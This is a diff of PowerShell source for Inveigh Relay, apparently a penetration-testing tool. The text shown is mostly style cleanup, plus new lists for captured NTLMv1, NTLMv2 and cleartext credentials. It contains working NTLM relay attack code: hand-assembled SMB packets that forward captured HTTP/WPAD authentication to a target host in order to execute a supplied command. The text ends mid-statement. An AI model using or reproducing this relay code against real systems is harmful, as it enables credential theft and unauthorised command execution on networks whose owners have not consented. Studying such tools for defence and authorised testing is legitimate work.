-    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$HTTP="Y",
-    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$HTTPS="N",
-    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$ConsoleOutput="N",
-    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$FileOutput="N",
-    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$StatusOutput="Y",
-    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$OutputStreamOnly="N",
-    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$MachineAccounts="N",
-    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$ShowHelp="Y",
-    [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$SMBRelayAutoDisable="Y",
-    [parameter(Mandatory=$false)][ValidateSet("Anonymous","NTLM")][string]$WPADAuth="NTLM",
-    [parameter(Mandatory=$false)][ValidateSet("0","1","2")][string]$Tool="0",
-    [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][string]$OutputDir="",
-    [parameter(Mandatory=$true)][ValidateScript({$_ -match [IPAddress]$_ })][string]$SMBRelayTarget ="",
-    [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][string]$Challenge="",
-    [parameter(Mandatory=$false)][array]$SMBRelayUsernames="",
-    [parameter(Mandatory=$false)][int]$SMBRelayNetworkTimeout="",
-    [parameter(Mandatory=$false)][int]$RunTime="",
-    [parameter(Mandatory=$true)][string]$SMBRelayCommand = "", 
-    [parameter(Mandatory=$false)][string]$HTTPSCertAppID="00112233-4455-6677-8899-AABBCCDDEEFF",
-    [parameter(Mandatory=$false)][string]$HTTPSCertThumbprint="98c1d54840c5c12ced710758b6ee56cc62fa1f0d",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP="Y",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPS="N",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleOutput="N",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput="N",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput="Y",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly="N",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts="N",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp="Y",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SMBRelayAutoDisable="Y",
+    [parameter(Mandatory=$false)][ValidateSet("Anonymous","NTLM")][String]$WPADAuth="NTLM",
+    [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool="0",
+    [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$OutputDir="",
+    [parameter(Mandatory=$true)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SMBRelayTarget ="",
+    [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge="",
+    [parameter(Mandatory=$false)][Array]$SMBRelayUsernames="",
+    [parameter(Mandatory=$false)][Int]$SMBRelayNetworkTimeout="",
+    [parameter(Mandatory=$false)][Int]$RunTime="",
+    [parameter(Mandatory=$true)][String]$SMBRelayCommand = "",
+    [parameter(Mandatory=$false)][String]$HTTPSCertAppID="00112233-4455-6677-8899-AABBCCDDEEFF",
+    [parameter(Mandatory=$false)][String]$HTTPSCertThumbprint="98c1d54840c5c12ced710758b6ee56cc62fa1f0d",
     [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
 )
 
@@ -124,12 +129,12 @@ if ($invalid_parameter)
 
 if(!$SMBRelayTarget)
 {
-    Throw "You must specify an -SMBRelayTarget if enabling -SMBRelay"
+    throw "You must specify an -SMBRelayTarget if enabling -SMBRelay"
 }
 
 if(!$SMBRelayCommand)
 {
-    Throw "You must specify an -SMBRelayCommand if enabling -SMBRelay"
+    throw "You must specify an -SMBRelayCommand if enabling -SMBRelay"
 }
 
 if(!$OutputDir)
@@ -143,12 +148,15 @@ else
 
 if(!$inveigh)
 {
-    $global:inveigh = [hashtable]::Synchronized(@{})
+    $global:inveigh = [HashTable]::Synchronized(@{})
     $inveigh.log = New-Object System.Collections.ArrayList
     $inveigh.NTLMv1_list = New-Object System.Collections.ArrayList
+    $inveigh.NTLMv1_username_list = New-Object System.Collections.ArrayList
     $inveigh.NTLMv2_list = New-Object System.Collections.ArrayList
-    $inveigh.IP_capture_list = @()
-    $inveigh.SMBRelay_failed_list = @()
+    $inveigh.NTLMv2_username_list = New-Object System.Collections.ArrayList
+    $inveigh.cleartext_list = New-Object System.Collections.ArrayList
+    $inveigh.IP_capture_list = New-Object System.Collections.ArrayList
+    $inveigh.SMBRelay_failed_list = New-Object System.Collections.ArrayList
 }
 
 if($inveigh.HTTP_listener.IsListening)
@@ -180,7 +188,7 @@ $inveigh.relay_running = $true
 $inveigh.SMB_relay_active_step = 0
 $inveigh.SMB_relay = $true
 
-if($StatusOutput -eq 'y')
+if($StatusOutput -eq 'Y')
 {
     $inveigh.status_output = $true
 }
@@ -189,7 +197,7 @@ else
     $inveigh.status_output = $false
 }
 
-if($OutputStreamOnly -eq 'y')
+if($OutputStreamOnly -eq 'Y')
 {
     $inveigh.output_stream_only = $true
 }
@@ -223,22 +231,23 @@ else
 # Write startup messages
 if(!$inveigh.running)
 {
-    $inveigh.status_queue.add("Inveigh Relay started at $(Get-Date -format 's')")|Out-Null
-    $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - Inveigh Relay started")]) |Out-Null
+    $inveigh.status_queue.Add("Inveigh Relay started at $(Get-Date -format 's')") > $null
+    $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay started")]) > $null
 
-    if($HTTP -eq 'y')
+    if($HTTP -eq 'Y')
     {
         $inveigh.HTTP = $true
-        $inveigh.status_queue.add("HTTP Capture Enabled")|Out-Null
+        $inveigh.status_queue.Add("HTTP Capture Enabled")  > $null
     }
     else
     {
         $inveigh.HTTP = $false
-        $inveigh.status_queue.add("HTTP Capture Disabled")|Out-Null
+        $inveigh.status_queue.Add("HTTP Capture Disabled")  > $null
     }
 
-    if($HTTPS -eq 'y')
+    if($HTTPS -eq 'Y')
     {
+
         try
         {
             $inveigh.HTTPS = $true
@@ -252,188 +261,210 @@ if(!$inveigh.running)
             $netsh_app_ID = "appid={" + $inveigh.certificate_application_ID + "}"
             $netsh_arguments = @("http","add","sslcert","ipport=0.0.0.0:443",$netsh_certhash,$netsh_app_ID)
             & "netsh" $netsh_arguments > $null
-            $inveigh.status_queue.add("HTTPS Capture Enabled")|Out-Null
+            $inveigh.status_queue.Add("HTTPS Capture Enabled")  > $null
         }
         catch
         {
             $certificate_store.Close()
             $HTTPS="N"
             $inveigh.HTTPS = $false
-            $inveigh.status_queue.add("HTTPS Capture Disabled Due To Certificate Install Error")|Out-Null
+            $inveigh.status_queue.Add("HTTPS Capture Disabled Due To Certificate Install Error")  > $null
         }
+
     }
     else
     {
-        $inveigh.status_queue.add("HTTPS Capture Disabled")|Out-Null
+        $inveigh.status_queue.Add("HTTPS Capture Disabled")  > $null
     }
 
     if($Challenge)
     {
         $Inveigh.challenge = $challenge
-        $inveigh.status_queue.add("NTLM Challenge = $Challenge")|Out-Null
+        $inveigh.status_queue.Add("NTLM Challenge = $Challenge")  > $null
     }
 
-    if($MachineAccounts -eq 'n')
+    if($MachineAccounts -eq 'N')
     {
-        $inveigh.status_queue.add("Ignoring Machine Accounts")|Out-Null
+        $inveigh.status_queue.Add("Ignoring Machine Accounts") > $null
+        $inveigh.machine_accounts = $false
+    }
+    else
+    {
+        $inveigh.machine_accounts = $true
     }
 
-    $inveigh.status_queue.add("Force WPAD Authentication = $WPADAuth")|Out-Null
+    $inveigh.status_queue.Add("Force WPAD Authentication = $WPADAuth") > $null
 
-    if($ConsoleOutput -eq 'y')
+    if($ConsoleOutput -eq 'Y')
     {
-        $inveigh.status_queue.add("Real Time Console Output Enabled")|Out-Null
+        $inveigh.status_queue.Add("Real Time Console Output Enabled") > $null
         $inveigh.console_output = $true
     }
     else
     {
+
         if($inveigh.tool -eq 1)
         {
-            $inveigh.status_queue.add("Real Time Console Output Disabled Due To External Tool Selection")|Out-Null
+            $inveigh.status_queue.Add("Real Time Console Output Disabled Due To External Tool Selection") > $null
         }
         else
         {
-            $inveigh.status_queue.add("Real Time Console Output Disabled")|Out-Null
+            $inveigh.status_queue.Add("Real Time Console Output Disabled") > $null
         }
+
     }
 
-    if($FileOutput -eq 'y')
+    if($FileOutput -eq 'Y')
     {
-        $inveigh.status_queue.add("Real Time File Output Enabled")|Out-Null
-        $inveigh.status_queue.add("Output Directory = $output_directory")|Out-Null
+        $inveigh.status_queue.Add("Real Time File Output Enabled") > $null
+        $inveigh.status_queue.Add("Output Directory = $output_directory") > $null
         $inveigh.file_output = $true
     }
     else
     {
-        $inveigh.status_queue.add("Real Time File Output Disabled")|Out-Null
+        $inveigh.status_queue.Add("Real Time File Output Disabled") > $null
     }
 
     if($RunTime -eq 1)
     {
-        $inveigh.status_queue.add("Run Time = $RunTime Minute")|Out-Null
+        $inveigh.status_queue.Add("Run Time = $RunTime Minute") > $null
     }
     elseif($RunTime -gt 1)
     {
-        $inveigh.status_queue.add("Run Time = $RunTime Minutes")|Out-Null
+        $inveigh.status_queue.Add("Run Time = $RunTime Minutes") > $null
     }
+
 }
 
-$inveigh.status_queue.add("SMB Relay Enabled") |Out-Null
-$inveigh.status_queue.add("SMB Relay Target = $SMBRelayTarget")|Out-Null
+$inveigh.status_queue.Add("SMB Relay Enabled")  > $null
+$inveigh.status_queue.Add("SMB Relay Target = $SMBRelayTarget") > $null
 
 if($SMBRelayUsernames)
 {
+
     if($SMBRelayUsernames.Count -eq 1)
     {
-        $inveigh.status_queue.add("SMB Relay Username = " + $SMBRelayUsernames -join ",")|Out-Null
+        $inveigh.status_queue.Add("SMB Relay Username = " + $SMBRelayUsernames -join ",") > $null
     }
     else
     {
-        $inveigh.status_queue.add("SMB Relay Usernames = " + $SMBRelayUsernames -join ",")|Out-Null
+        $inveigh.status_queue.Add("SMB Relay Usernames = " + $SMBRelayUsernames -join ",") > $null
     }
+
 }
 
-if($SMBRelayAutoDisable -eq 'y')
+if($SMBRelayAutoDisable -eq 'Y')
 {
-    $inveigh.status_queue.add("SMB Relay Auto Disable Enabled")|Out-Null
+    $inveigh.status_queue.Add("SMB Relay Auto Disable Enabled") > $null
 }
 else
 {
-    $inveigh.status_queue.add("SMB Relay Auto Disable Disabled")|Out-Null
+    $inveigh.status_queue.Add("SMB Relay Auto Disable Disabled") > $null
 }
 
 if($SMBRelayNetworkTimeout)
 {
-    $inveigh.status_queue.add("SMB Relay Network Timeout = $SMBRelayNetworkTimeout Seconds")|Out-Null
+    $inveigh.status_queue.Add("SMB Relay Network Timeout = $SMBRelayNetworkTimeout Seconds") > $null
 }
 
-if($ShowHelp -eq 'y')
+if($ShowHelp -eq 'Y')
 {
-    $inveigh.status_queue.add("Use Get-Command -Noun Inveigh* to show available functions")|Out-Null
-    $inveigh.status_queue.add("Run Stop-Inveigh to stop Inveigh")|Out-Null
+    $inveigh.status_queue.Add("Use Get-Command -Noun Inveigh* to show available functions") > $null
+    $inveigh.status_queue.Add("Run Stop-Inveigh to stop Inveigh") > $null
         
     if($inveigh.console_output)
     {
-        $inveigh.status_queue.add("Press any key to stop real time console output")|Out-Null
+        $inveigh.status_queue.Add("Press any key to stop real time console output") > $null
     }
+
 }
 
 if($inveigh.status_output)
 {
+
     while($inveigh.status_queue.Count -gt 0)
     {
+
         if($inveigh.output_stream_only)
         {
-            write-output($inveigh.status_queue[0] + $inveigh.newline)
+            Write-Output($inveigh.status_queue[0] + $inveigh.newline)
             $inveigh.status_queue.RemoveRange(0,1)
         }
         else
         {
+
             switch ($inveigh.status_queue[0])
             {
+
                 "Run Stop-Inveigh to stop Inveigh"
                 {
-                    write-warning($inveigh.status_queue[0])
+                    Write-Warning($inveigh.status_queue[0])
                     $inveigh.status_queue.RemoveRange(0,1)
                 }
+
                 default
                 {
-                    write-output($inveigh.status_queue[0])
+                    Write-Output($inveigh.status_queue[0])
                     $inveigh.status_queue.RemoveRange(0,1)
                 }
+
             }
+
         }
+
     }
+
 }
 
-$process_ID = [System.Diagnostics.Process]::GetCurrentProcess() |Select-Object -expand id
-$process_ID = [BitConverter]::ToString([BitConverter]::GetBytes($process_ID))
+$process_ID = [System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -expand id
+$process_ID = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($process_ID))
 $process_ID = $process_ID -replace "-00-00",""
-[Byte[]]$inveigh.process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[CHAR][CONVERT]::toint16($_,16)}
+[Byte[]] $inveigh.process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
 
 # Begin ScriptBlocks
 
-# Shared Basic Functions ScriptBlock
+# Shared Basic functions ScriptBlock
 $shared_basic_functions_scriptblock =
 {
-    Function DataToUInt16($field)
+    function DataToUInt16($field)
     {
 	   [Array]::Reverse($field)
-	   return [BitConverter]::ToUInt16($field,0)
+	   return [System.BitConverter]::ToUInt16($field,0)
     }
 
-    Function DataToUInt32($field)
+    function DataToUInt32($field)
     {
 	   [Array]::Reverse($field)
-	   return [BitConverter]::ToUInt32($field,0)
+	   return [System.BitConverter]::ToUInt32($field,0)
     }
 
-    Function DataLength
+    function DataLength
     {
-        param ([int]$length_start,[byte[]]$string_extract_data)
+        param ([Int]$length_start,[Byte[]]$string_extract_data)
 
         $string_length = [System.BitConverter]::ToInt16($string_extract_data[$length_start..($length_start + 1)],0)
         return $string_length
     }
 
-    Function DataToString
+    function DataToString
     {
-        param ([int]$string_length,[int]$string2_length,[int]$string3_length,[int]$string_start,[byte[]]$string_extract_data)
+        param ([Int]$string_length,[Int]$string2_length,[Int]$string3_length,[Int]$string_start,[Byte[]]$string_extract_data)
 
-        $string_data = [System.BitConverter]::ToString($string_extract_data[($string_start+$string2_length+$string3_length)..($string_start+$string_length+$string2_length+$string3_length-1)])
+        $string_data = [System.BitConverter]::ToString($string_extract_data[($string_start+$string2_length+$string3_length)..($string_start+$string_length+$string2_length+$string3_length - 1)])
         $string_data = $string_data -replace "-00",""
-        $string_data = $string_data.Split("-") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
+        $string_data = $string_data.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
         $string_extract = New-Object System.String ($string_data,0,$string_data.Length)
+
         return $string_extract
     }
 }
 
-# SMB NTLM Functions ScriptBlock - function for parsing NTLM challenge/response
+# SMB NTLM functions ScriptBlock - function for parsing NTLM challenge/response
 $SMB_NTLM_functions_scriptblock =
 {
-    Function SMBNTLMChallenge
+    function SMBNTLMChallenge
     {
-        param ([byte[]]$payload_bytes)
+        param ([Byte[]]$payload_bytes)
 
         $payload = [System.BitConverter]::ToString($payload_bytes)
         $payload = $payload -replace "-",""
@@ -446,12 +477,13 @@ $SMB_NTLM_functions_scriptblock =
 
         return $NTLM_challenge
     }
+
 }
 
 # SMB Relay Challenge ScriptBlock - gathers NTLM server challenge from relay target
 $SMB_relay_challenge_scriptblock =
 {
-    Function SMBRelayChallenge
+    function SMBRelayChallenge
     {
         param ($SMB_relay_socket,$HTTP_request_bytes)
 
@@ -461,91 +493,103 @@ $SMB_relay_challenge_scriptblock =
         }
         
         $SMB_relay_challenge_bytes = New-Object System.Byte[] 1024
-
         $i = 0
         
         :SMB_relay_challenge_loop while ($i -lt 2)
         {
+        
             switch ($i)
             {
-                0 {
-                    [Byte[]] $SMB_relay_challenge_send = (0x00,0x00,0x00,0x2f,0xff,0x53,0x4d,0x42,0x72,0x00,0x00,0x00,0x00,0x18,0x01,0x48)`
-                        + (0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff)`
-                        + $inveigh.process_ID_bytes`
-                        + (0x00,0x00,0x00,0x00,0x00,0x0c,0x00,0x02,0x4e,0x54,0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x00)
+
+                0
+                {
+                    $SMB_relay_challenge_send = 0x00,0x00,0x00,0x2f,0xff,0x53,0x4d,0x42,0x72,0x00,0x00,0x00,0x00,
+                                                0x18,0x01,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
+                                                0x00,0x00,0xff,0xff +
+                                                $inveigh.process_ID_bytes +
+                                                0x00,0x00,0x00,0x00,0x00,0x0c,0x00,0x02,0x4e,0x54,0x20,0x4c,0x4d,
+                                                0x20,0x30,0x2e,0x31,0x32,0x00
                 }
                 
-                1 { 
-                    $SMB_length_1 = '0x{0:X2}' -f ($HTTP_request_bytes.length + 32)
-                    $SMB_length_2 = '0x{0:X2}' -f ($HTTP_request_bytes.length + 22)
-                    $SMB_length_3 = '0x{0:X2}' -f ($HTTP_request_bytes.length + 2)
-                    $SMB_NTLMSSP_length = '0x{0:X2}' -f ($HTTP_request_bytes.length)
-                    $SMB_blob_length = [BitConverter]::ToString([BitConverter]::GetBytes($HTTP_request_bytes.length + 34))
+                1
+                { 
+                    $SMB_length_1 = '0x{0:X2}' -f ($HTTP_request_bytes.Length + 32)
+                    $SMB_length_2 = '0x{0:X2}' -f ($HTTP_request_bytes.Length + 22)
+                    $SMB_length_3 = '0x{0:X2}' -f ($HTTP_request_bytes.Length + 2)
+                    $SMB_NTLMSSP_length = '0x{0:X2}' -f ($HTTP_request_bytes.Length)
+                    $SMB_blob_length = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 34))
                     $SMB_blob_length = $SMB_blob_length -replace "-00-00",""
-                    $SMB_blob_length = $SMB_blob_length.Split("-") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
-                    $SMB_byte_count = [BitConverter]::ToString([BitConverter]::GetBytes($HTTP_request_bytes.length + 45))
+                    $SMB_blob_length = $SMB_blob_length.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+                    $SMB_byte_count = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 45))
                     $SMB_byte_count = $SMB_byte_count -replace "-00-00",""
-                    $SMB_byte_count = $SMB_byte_count.Split("-") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
-                    $SMB_netbios_length = [BitConverter]::ToString([BitConverter]::GetBytes($HTTP_request_bytes.length + 104))
+                    $SMB_byte_count = $SMB_byte_count.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+                    $SMB_netbios_length = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 104))
                     $SMB_netbios_length = $SMB_netbios_length -replace "-00-00",""
-                    $SMB_netbios_length = $SMB_netbios_length.Split("-") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
-                    [array]::Reverse($SMB_netbios_length)
+                    $SMB_netbios_length = $SMB_netbios_length.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+                    [Array]::Reverse($SMB_netbios_length)
                     
-                    [Byte[]] $SMB_relay_challenge_send = (0x00,0x00)`
-                        + $SMB_netbios_length`
-                        + (0xff,0x53,0x4d,0x42,0x73,0x00,0x00,0x00,0x00,0x18,0x01,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff)`
-                        + $inveigh.process_ID_bytes`
-                        + (0x00,0x00,0x00,0x00,0x0c,0xff,0x00,0x00,0x00,0xff,0xff,0x02,0x00,0x01,0x00,0x00,0x00,0x00,0x00)`
-                        + $SMB_blob_length`
-                        + (0x00,0x00,0x00,0x00,0x44,0x00,0x00,0x80)`
-                        + $SMB_byte_count`
-                        + (0x60)`
-                        + $SMB_length_1`
-                        + (0x06,0x06,0x2b,0x06,0x01,0x05,0x05,0x02,0xa0)`
-                        + $SMB_length_2`
-                        + (0x30,0x3c,0xa0,0x0e,0x30,0x0c,0x06,0x0a,0x2b,0x06,0x01,0x04,0x01,0x82,0x37,0x02,0x02,0x0a,0xa2)`
-                        + $SMB_length_3`
-                        + (0x04)`
-                        + $SMB_NTLMSSP_length`
-                        + $HTTP_request_bytes`
-                        + (0x55,0x6e,0x69,0x78,0x00,0x53,0x61,0x6d,0x62,0x61,0x00)
+                    $SMB_relay_challenge_send = 0x00,0x00 +
+                                                $SMB_netbios_length +
+                                                0xff,0x53,0x4d,0x42,0x73,0x00,0x00,0x00,0x00,0x18,0x01,0x48,0x00,
+                                                0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff +
+                                                $inveigh.process_ID_bytes +
+                                                0x00,0x00,0x00,0x00,0x0c,0xff,0x00,0x00,0x00,0xff,0xff,0x02,0x00,
+                                                0x01,0x00,0x00,0x00,0x00,0x00 +
+                                                $SMB_blob_length +
+                                                0x00,0x00,0x00,0x00,0x44,0x00,0x00,0x80 +
+                                                $SMB_byte_count +
+                                                0x60 +
+                                                $SMB_length_1 +
+                                                0x06,0x06,0x2b,0x06,0x01,0x05,0x05,0x02,0xa0 +
+                                                $SMB_length_2 +
+                                                0x30,0x3c,0xa0,0x0e,0x30,0x0c,0x06,0x0a,0x2b,0x06,0x01,0x04,0x01,
+                                                0x82,0x37,0x02,0x02,0x0a,0xa2 +
+                                                $SMB_length_3 +
+                                                0x04 +
+                                                $SMB_NTLMSSP_length +
+                                                $HTTP_request_bytes +
+                                                0x55,0x6e,0x69,0x78,0x00,0x53,0x61,0x6d,0x62,0x61,0x00
                 }
+            
             }
 
-            $SMB_relay_challenge_stream.Write($SMB_relay_challenge_send, 0, $SMB_relay_challenge_send.length)
+            $SMB_relay_challenge_stream.Write($SMB_relay_challenge_send,0,$SMB_relay_challenge_send.Length)
             $SMB_relay_challenge_stream.Flush()
             
             if($SMBRelayNetworkTimeout)
             {
                 $SMB_relay_challenge_timeout = new-timespan -Seconds $SMBRelayNetworkTimeout
-                $SMB_relay_challenge_stopwatch = [diagnostics.stopwatch]::StartNew()
+                $SMB_relay_challenge_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
                 
                 while(!$SMB_relay_challenge_stream.DataAvailable)
                 {
-                    if($SMB_relay_challenge_stopwatch.elapsed -ge $SMB_relay_challenge_timeout)
+
+                    if($SMB_relay_challenge_stopwatch.Elapsed -ge $SMB_relay_challenge_timeout)
                     {
-                        $inveigh.console_queue.add("SMB relay target didn't respond within $SMBRelayNetworkTimeout seconds")
-                        $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - SMB relay target didn't respond within $SMBRelayNetworkTimeout seconds")])
+                        $inveigh.console_queue.Add("SMB relay target didn't respond within $SMBRelayNetworkTimeout seconds")
+                        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay target didn't respond within $SMBRelayNetworkTimeout seconds")])
                         $inveigh.SMB_relay_active_step = 0
                         $SMB_relay_socket.Close()
                         break SMB_relay_challenge_loop
                     }
+                
                 }
+            
             }
     
-            $SMB_relay_challenge_stream.Read($SMB_relay_challenge_bytes, 0, $SMB_relay_challenge_bytes.length)
-
+            $SMB_relay_challenge_stream.Read($SMB_relay_challenge_bytes,0,$SMB_relay_challenge_bytes.Length)
             $i++
         }
         
         return $SMB_relay_challenge_bytes
     }
+
 }
 
 # SMB Relay Response ScriptBlock - sends NTLM reponse to relay target
 $SMB_relay_response_scriptblock =
 {
-    Function SMBRelayResponse
+    function SMBRelayResponse
     {
         param ($SMB_relay_socket,$HTTP_request_bytes,$SMB_user_ID)
     
@@ -556,93 +600,96 @@ $SMB_relay_response_scriptblock =
             $SMB_relay_response_stream = $SMB_relay_socket.GetStream()
         }
 
-        $SMB_length_1 = [BitConverter]::ToString([BitConverter]::GetBytes($HTTP_request_bytes.length + 12))
+        $SMB_length_1 = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 12))
         $SMB_length_1 = $SMB_length_1 -replace "-00-00",""
-        $SMB_length_1 = $SMB_length_1.Split("-") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
-        $SMB_length_2 = [BitConverter]::ToString([BitConverter]::GetBytes($HTTP_request_bytes.length + 8))
+        $SMB_length_1 = $SMB_length_1.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+        $SMB_length_2 = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 8))
         $SMB_length_2 = $SMB_length_2 -replace "-00-00",""
-        $SMB_length_2 = $SMB_length_2.Split("-") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
-        $SMB_length_3 = [BitConverter]::ToString([BitConverter]::GetBytes($HTTP_request_bytes.length + 4))
+        $SMB_length_2 = $SMB_length_2.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+        $SMB_length_3 = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 4))
         $SMB_length_3 = $SMB_length_3 -replace "-00-00",""
-        $SMB_length_3 = $SMB_length_3.Split("-") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
-        $SMB_NTLMSSP_length = [BitConverter]::ToString([BitConverter]::GetBytes($HTTP_request_bytes.length))
+        $SMB_length_3 = $SMB_length_3.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+        $SMB_NTLMSSP_length = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length))
         $SMB_NTLMSSP_length = $SMB_NTLMSSP_length -replace "-00-00",""
-        $SMB_NTLMSSP_length = $SMB_NTLMSSP_length.Split("-") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
-        $SMB_blob_length = [BitConverter]::ToString([BitConverter]::GetBytes($HTTP_request_bytes.length + 16))
+        $SMB_NTLMSSP_length = $SMB_NTLMSSP_length.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+        $SMB_blob_length = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 16))
         $SMB_blob_length = $SMB_blob_length -replace "-00-00",""
-        $SMB_blob_length = $SMB_blob_length.Split("-") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
-        $SMB_byte_count = [BitConverter]::ToString([BitConverter]::GetBytes($HTTP_request_bytes.length + 27))
+        $SMB_blob_length = $SMB_blob_length.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+        $SMB_byte_count = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 27))
         $SMB_byte_count = $SMB_byte_count -replace "-00-00",""
-        $SMB_byte_count = $SMB_byte_count.Split("-") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
-        $SMB_netbios_length = [BitConverter]::ToString([BitConverter]::GetBytes($HTTP_request_bytes.length + 86))
+        $SMB_byte_count = $SMB_byte_count.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+        $SMB_netbios_length = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 86))
         $SMB_netbios_length = $SMB_netbios_length -replace "-00-00",""
-        $SMB_netbios_length = $SMB_netbios_length.Split("-") | ForEach-Object{ [CHAR][CONVERT]::toint16($_,16)}
-        [array]::Reverse($SMB_length_1)
-        [array]::Reverse($SMB_length_2)
-        [array]::Reverse($SMB_length_3)
-        [array]::Reverse($SMB_NTLMSSP_length)
-        [array]::Reverse($SMB_netbios_length)
-        
+        $SMB_netbios_length = $SMB_netbios_length.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+        [Array]::Reverse($SMB_length_1)
+        [Array]::Reverse($SMB_length_2)
+        [Array]::Reverse($SMB_length_3)
+        [Array]::Reverse($SMB_NTLMSSP_length)
+        [Array]::Reverse($SMB_netbios_length)
         $j = 0
         
         :SMB_relay_response_loop while ($j -lt 1)
         {
-            [Byte[]] $SMB_relay_response_send = (0x00,0x00)`
-                + $SMB_netbios_length`
-                + (0xff,0x53,0x4d,0x42,0x73,0x00,0x00,0x00,0x00,0x18,0x01,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff)`
-                + $inveigh.process_ID_bytes`
-                + $SMB_user_ID`
-                + (0x00,0x00,0x0c,0xff,0x00,0x00,0x00,0xff,0xff,0x02,0x00,0x01,0x00,0x00,0x00,0x00,0x00)`
-                + $SMB_blob_length`
-                + (0x00,0x00,0x00,0x00,0x44,0x00,0x00,0x80)`
-                + $SMB_byte_count`
-                + (0xa1,0x82)`
-                + $SMB_length_1`
-                + (0x30,0x82)`
-                + $SMB_length_2`
-                + (0xa2,0x82)`
-                + $SMB_length_3`
-                + (0x04,0x82)`
-                + $SMB_NTLMSSP_length`
-                + $HTTP_request_bytes`
-                + (0x55,0x6e,0x69,0x78,0x00,0x53,0x61,0x6d,0x62,0x61,0x00)
+            $SMB_relay_response_send = 0x00,0x00 +
+                                       $SMB_netbios_length +
+                                       0xff,0x53,0x4d,0x42,0x73,0x00,0x00,0x00,0x00,0x18,0x01,0x48,0x00,0x00,0x00,
+                                       0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff +
+                                       $inveigh.process_ID_bytes +
+                                       $SMB_user_ID +
